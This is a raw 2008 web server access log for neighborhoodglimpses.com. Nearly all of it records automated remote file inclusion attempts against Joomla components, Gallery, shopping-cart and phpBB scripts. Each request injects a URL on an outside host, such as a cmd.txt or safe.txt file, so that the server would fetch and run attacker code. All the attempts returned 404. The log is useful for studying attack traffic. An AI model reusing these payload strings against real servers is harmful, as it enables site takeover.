66.7.197.76 - - [06/Jul/2008:20:01:22 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:20:01:22 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:02:28 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:02:28 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:02:28 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:20:03:36 -0700] "GET /logs/access_080211.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:20:03:37 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
59.106.19.213 - - [06/Jul/2008:20:04:20 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
59.106.19.213 - - [06/Jul/2008:20:04:21 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:04:43 -0700] "GET /logs/access_080211.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:04:43 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:04:43 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:05:17 -0700] "GET /logs/access_080211.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:05:18 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:05:18 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:07:31 -0700] "GET /logs/access_080211.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:07:31 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
194.165.34.81 - - [06/Jul/2008:20:08:24 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.iglesialcs.cl/newweb//images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
194.165.34.81 - - [06/Jul/2008:20:08:26 -0700] "GET /logs/access_080211.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.iglesialcs.cl/newweb//images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
194.165.34.81 - - [06/Jul/2008:20:08:27 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.iglesialcs.cl/newweb//images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:09:26 -0700] "GET /logs/access_080211.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:09:26 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:09:26 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:20:09:42 -0700] "GET /logs/access_080211.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:20:09:42 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:20:09:43 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
203.88.121.128 - - [06/Jul/2008:20:12:46 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:20:12:57 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:20:12:57 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:20:13:00 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:20:13:00 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
85.25.142.64 - - [06/Jul/2008:20:13:39 -0700] "GET /logs/index.php?redir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.neighborhoodglimpses.com"
85.25.142.64 - - [06/Jul/2008:20:13:41 -0700] "GET /index.php?redir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.neighborhoodglimpses.com"
85.25.142.64 - - [06/Jul/2008:20:13:53 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.neighborhoodglimpses.com"
85.25.142.64 - - [06/Jul/2008:20:13:54 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.neighborhoodglimpses.com"
85.25.142.64 - - [06/Jul/2008:20:14:03 -0700] "GET /logs/index.php?redir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "neighborhoodglimpses.com"
85.25.142.64 - - [06/Jul/2008:20:14:03 -0700] "GET /index.php?redir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "neighborhoodglimpses.com"
85.25.142.64 - - [06/Jul/2008:20:14:13 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "neighborhoodglimpses.com"
85.25.142.64 - - [06/Jul/2008:20:14:13 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "neighborhoodglimpses.com"
206.71.148.152 - - [06/Jul/2008:20:16:13 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
206.71.148.152 - - [06/Jul/2008:20:16:13 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
206.71.148.152 - - [06/Jul/2008:20:16:13 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
203.88.121.128 - - [06/Jul/2008:20:16:40 -0700] "GET /logs/access.log/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
203.88.121.128 - - [06/Jul/2008:20:16:40 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
203.88.121.128 - - [06/Jul/2008:20:16:41 -0700] "GET /logs/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:20:17:07 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:20:17:08 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:20:17:08 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
193.233.85.46 - - [06/Jul/2008:20:17:18 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
77.249.65.213 - - [06/Jul/2008:20:19:01 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
72.55.179.141 - - [06/Jul/2008:20:19:22 -0700] "GET /logs/access_080211.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
72.55.179.141 - - [06/Jul/2008:20:19:23 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
72.55.179.141 - - [06/Jul/2008:20:19:23 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
69.13.27.210 - - [06/Jul/2008:20:20:18 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:20:20:34 -0700] "GET /logs/access_071105.log//init_basic.php?GALLERY_BASEDIR=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:20:20:46 -0700] "GET /logs/access_071105.log//init_basic.php?GALLERY_BASEDIR=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
213.35.225.138 - - [06/Jul/2008:20:21:01 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/jempiak/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
70.84.182.98 - - [06/Jul/2008:20:21:52 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/testsken/files/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.neighborhoodglimpses.com"
70.84.182.98 - - [06/Jul/2008:20:21:53 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/testsken/files/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:20:21:55 -0700] "GET /logs/access_080225.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
206.71.148.152 - - [06/Jul/2008:20:23:31 -0700] "GET /logs/access_071105.log//init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
209.172.55.13 - - [06/Jul/2008:20:23:35 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
70.85.96.130 - - [06/Jul/2008:20:24:11 -0700] "GET /logs/access_071105.log//init_basic.php?GALLERY_BASEDIR=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
125.245.146.189 - - [06/Jul/2008:20:24:20 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
125.245.146.189 - - [06/Jul/2008:20:24:22 -0700] "GET /lostpasswd.php?env[include_prefix]=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
125.245.146.189 - - [06/Jul/2008:20:24:28 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:26:16 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:26:16 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:26:16 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:26:17 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:26:17 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:26:17 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
207.58.170.49 - - [06/Jul/2008:20:28:05 -0700] "GET /logs/access_080211.log/init.inc.php?pri_group=http://tiemeup.com.au/admin/tmu_sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
207.58.170.49 - - [06/Jul/2008:20:28:05 -0700] "GET /init.inc.php?pri_group=http://tiemeup.com.au/admin/tmu_sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
207.58.170.49 - - [06/Jul/2008:20:28:05 -0700] "GET /logs/init.inc.php?pri_group=http://tiemeup.com.au/admin/tmu_sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:28:48 -0700] "GET /logs/access_080211.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:28:48 -0700] "GET /logs/access_080211.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:28:49 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:28:49 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:28:49 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:28:49 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:28:56 -0700] "GET /logs/access_080225.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
217.20.175.69 - - [06/Jul/2008:20:29:08 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
66.7.197.76 - - [06/Jul/2008:20:29:57 -0700] "GET /logs/access_080225.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:30:15 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/fuck.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:30:57 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/fuck.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
74.53.178.146 - - [06/Jul/2008:20:32:01 -0700] "GET /logs/access_080225.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
195.110.147.194 - - [06/Jul/2008:20:32:40 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "neighborhoodglimpses.com"
147.202.40.223 - - [06/Jul/2008:20:36:55 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "neighborhoodglimpses.com"
69.13.27.210 - - [06/Jul/2008:20:38:20 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
69.13.27.210 - - [06/Jul/2008:20:38:20 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
69.13.27.210 - - [06/Jul/2008:20:38:20 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:38:54 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/fuck.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:38:55 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/fuck.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:40:39 -0700] "GET /logs/access_080211.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/fuck.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
195.54.9.218 - - [06/Jul/2008:20:40:39 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/jancokz/fuck.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
209.172.55.13 - - [06/Jul/2008:20:40:49 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.172.55.13 - - [06/Jul/2008:20:40:49 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
209.172.55.13 - - [06/Jul/2008:20:40:50 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
201.3.74.226 - - [06/Jul/2008:20:40:53 -0700] "GET /logs/access_080211.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:20:40:56 -0700] "GET /logs/access_080211.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:20:40:56 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [06/Jul/2008:20:40:56 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
201.3.74.226 - - [06/Jul/2008:20:40:59 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "neighborhoodglimpses.com"
201.3.74.226 - - [06/Jul/2008:20:41:05 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "neighborhoodglimpses.com"
213.35.225.138 - - [06/Jul/2008:20:41:44 -0700] "GET //program/modules/mods_full/shopping_cart/includes/index.php?_SESSION%5Bdocroot_path%5D=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
213.35.225.138 - - [06/Jul/2008:20:41:44 -0700] "GET //program/modules/mods_full/shopping_cart/includes/index.php?_SESSION%5Bdocroot_path%5D=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
